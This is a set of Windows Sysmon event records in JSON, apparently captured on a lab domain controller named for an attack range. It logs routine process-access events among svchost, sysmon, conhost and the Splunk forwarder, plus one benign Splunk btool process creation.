{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3538,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.696\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.696","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3539,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.696\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.696","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3540,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.696\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00108F7C0500}\r\nTargetProcessId: 4484\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.696","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00108F7C0500}","TargetProcessId":"4484","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3541,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.709\r\nProcessGuid: {E2A3D6B1-1103-5F25-0000-0010507D0500}\r\nProcessId: 4624\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool web list settings --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00108F7C0500}\r\nParentProcessId: 4484\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: btool  web list settings --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.709","ProcessGuid":"{E2A3D6B1-1103-5F25-0000-0010507D0500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool web list settings --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00108F7C0500}","ParentProcessId":"4484","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"btool  web list settings --no-log","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3542,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.696\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00108F7C0500}\r\nSourceProcessId: 4484\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-0010507D0500}\r\nTargetProcessId: 4624\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.696","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00108F7C0500}","SourceProcessId":"4484","SourceThreadId":"4488","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010507D0500}","TargetProcessId":"4624","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3543,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.696\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-0010507D0500}\r\nTargetProcessId: 4624\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.696","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010507D0500}","TargetProcessId":"4624","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3544,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.696\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.696","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3545,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.696\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.696","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3546,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.696\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.696","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
